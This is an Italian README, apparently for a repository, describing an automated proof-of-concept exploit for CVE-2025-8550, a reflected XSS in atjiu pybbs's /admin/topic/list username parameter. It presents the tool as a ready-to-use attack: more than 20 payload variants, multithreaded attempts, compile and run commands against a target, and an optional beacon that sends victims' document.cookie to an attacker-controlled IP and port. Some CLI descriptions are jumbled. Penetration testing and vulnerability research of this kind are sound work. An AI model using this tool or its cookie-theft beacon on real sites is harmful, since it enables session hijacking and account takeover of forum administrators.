
Exploit Proof-of-Concept automatizzato per CVE-2025-8550, una XSS riflessa in atjiu pybbs. Presenta oltre 20 varianti di payload, esfiltrazione di cookie, multithreading e CLI personalizzabile per il penetration testing.
Questo repository ospita un exploit Proof-of-Concept (PoC) automatizzato per CVE-2025-8550, una vulnerabilità di Cross‑Site Scripting (XSS) riflessa in atjiu pybbs (≤ v6.0.0). Prende di mira il parametro username dell'endpoint /admin/topic/list, che manca di una corretta sanificazione dell'input.
Oltre 20 varianti di payload: script, SVG, iframe, object, gestori onerror e altro.
Codifica URL automatica: garantisce un'iniezione sicura tramite curl_easy_escape di libcurl.
Esfiltrazione dei cookie (Opzionale): iniezione di un beacon per inviare document.cookie a un server controllato dall'attaccante.
Multithreading: utilizza pthreads per parallelizzare i tentativi e accelerare i test.
CLI personalizzabile: basata su , supporta la specifica di:
argparse-u / --url)-c / --cookies)-k / --cokpay)-i / --ip, -p / --port)-v / --verbose)# Compile the exploit binary
gcc exploit.c argparse.c -o CVE-2025-8550 -lcurl -lpthread
# Run against target
./CVE-2025-8550 -u http://<TARGET> -v [-c [COOKIE_FILE]]
#COOKIE SEND :
./CVE-2025-8550 -u http://TARGET -i <YOUR_IP> -p <YOUR_PORT> -v [VERBOSE_MODE] -k [PAYLOAD_COOKIE]
http://<TARGET> con la tua istanza di atjiu pybbs.-k per abilitare il beacon di furto cookie (richiede -i e -p).-c se non sono necessari cookie di autenticazione.Licenza MIT